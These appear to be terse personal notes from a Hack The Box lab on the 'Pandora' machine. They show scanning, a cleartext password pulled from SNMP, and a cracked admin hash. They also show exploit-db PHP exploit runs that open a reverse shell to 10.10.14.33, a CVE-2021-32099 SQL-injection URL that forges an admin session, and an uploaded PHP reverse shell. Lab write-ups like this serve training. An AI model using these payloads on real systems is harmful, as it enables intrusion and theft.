PANDORA
10.10.11.136

export TARGET=10.10.11.136

nmap -sC -sV -oA nmap/result $TARGET
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))

nikto
+ /: A Wordpress installation was found. (???)

──(vagrant㉿kali)-[/vagrant/data/htb/Pandora]
└─$ sudo nmap -sU $TARGET
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-16 22:28 EDT
Nmap scan report for panda.htb (10.10.11.136)
Host is up (0.15s latency).
Not shown: 999 closed udp ports (port-unreach)
PORT    STATE SERVICE
161/udp open  snmp



snmp-check
851                   runnable              sh                    /bin/sh               -c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'

ssh
user: daniel
password: HotelBabylon23

/var/www/pandora/pandora_console/pandoradb_data.sql
INSERT INTO `tusuario` (`id_user`, `fullname`, `firstname`, `lastname`, `middlename`, `password`, `comments`, `last_connect`, `registered`, `email`, `phone`, `is_admin`, `language`, `block_size`, `section`, `data_section`, `metaconsole_access`) VALUES
('admin', 'Pandora', 'Pandora', 'Admin', '', '1da7ee7d45b96d0e1f45ee4ee23da560', 'Admin Pandora', 1232642121, 0, 'admin@example.com', '555-555-5555', 1, 'default', 0, 'Default', '', 'advanced');

1da7ee7d45b96d0e1f45ee4ee23da560=pandora


cat /etc/apache2/sites-enabled/pandora.conf 
<VirtualHost localhost:80>
  ServerAdmin admin@panda.htb
  ServerName pandora.panda.htb
  DocumentRoot /var/www/pandora
  AssignUserID matt matt
  <Directory /var/www/pandora>
    AllowOverride All
  </Directory>
  ErrorLog /var/log/apache2/error.log
  CustomLog /var/log/apache2/access.log combined
</VirtualHost>



curl -X POST -d 'nick=admin' -d 'pass=pandora' http://127.0.0.1/pandora_console/index.php?login=1 #???

https://www.exploit-db.com/exploits/48280
php exploit.php http://127.0.0.1/pandora_console admin pandora 10.10.14.33 9999
php exploit.php http://127.0.0.1/pandora_console admin@example.com pandora 10.10.14.33 9999
php exploit.php http://127.0.0.1/pandora_console matt pandora 10.10.14.33 9999
php exploit.php http://127.0.0.1/pandora_console daniel HotelBabylon23 10.10.14.33 9999

forwarding port 80
└─$ ssh daniel@pandora -L 80:localhost:80


https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained
CVE-2021-32099
https://github.com/ibnuuby/CVE-2021-32099
http://localhost:8000/pandora_console/include/chart_generator.php?session_id=a%27%20UNION%20SELECT%20%27a%27,1,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20FROM%20tsessions_php%20WHERE%20%271%27=%271

http://localhost/pandora_console/images/php-reverse-shell.php